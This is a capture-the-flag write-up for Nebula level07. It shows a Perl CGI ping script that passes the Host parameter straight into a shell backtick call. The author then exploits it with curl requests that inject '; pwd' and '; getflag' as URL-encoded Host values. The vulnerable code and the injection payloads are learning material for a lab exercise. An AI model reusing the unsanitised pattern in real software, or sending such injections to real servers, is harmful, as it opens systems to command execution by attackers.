The next level provides us with some perl code:
#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
$host = $_[0];
print("<html><head><title>Ping results</title></head><body><pre>");
@output = `ping -c 3 $host 2>&1`;
foreach $line (@output) { print "$line"; }
print("</pre></body></html>");
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
After logging into the system, I looked at the home directory for flag07:
level07@nebula:/home/flag07$ ls -l
total 5
-rwxr-xr-x 1 root root 368 2011-11-20 21:22 index.cgi
-rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf
It appears that the perl code provided is running on a web server. I investigated the contents of thttpd.conf to glean some more information:
# Specifies an alternate port number to listen on.
port=7007
# Specifies what user to switch to after initialization when started as root.
user=flag07
The config file reveals that the web server is running on port 7007 as the flag07 user.
$ curl http://192.168.98.138:7007/index.cgi
<html><head><title>Ping results</title></head><body><pre>Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface]
[-M pmtudisc-hint] [-m mark] [-S sndbuf]
[-T tstamp-options] [-Q tos] [hop1 ...] destination
A quick curl command confirms that the web server is up, accessible, and running the perl ping code.
The code does not appear to be performing any input validation so lets try sending a semi-colon and an additional command at the Host parameter:
$ curl http://192.168.98.138:7007/index.cgi?Host=%3B%20pwd
<html><head><title>Ping results</title></head><body><pre>/home/flag07
Awesome! As you can see in the output, we can inject and run commands. Since the web server is running as flag07, let’s run getflag.
$ curl http://192.168.98.138:7007/index.cgi?Host=%3B%20getflag
<html><head><title>Ping results</title></head><body><pre>You have successfully executed getflag on a target account
The command executed successfully. On to level08!